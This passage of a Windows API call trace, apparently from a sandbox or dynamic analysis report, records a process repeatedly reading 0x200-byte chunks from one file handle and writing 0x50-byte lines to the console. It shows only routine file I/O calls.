nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.736] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.737] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.738] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.739] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.740] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.741] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.743] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] GetFileType (hFile=0x4c) returned 0x1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] GetFileType (hFile=0x4c) returned 0x1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] GetFileType (hFile=0x4c) returned 0x1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, 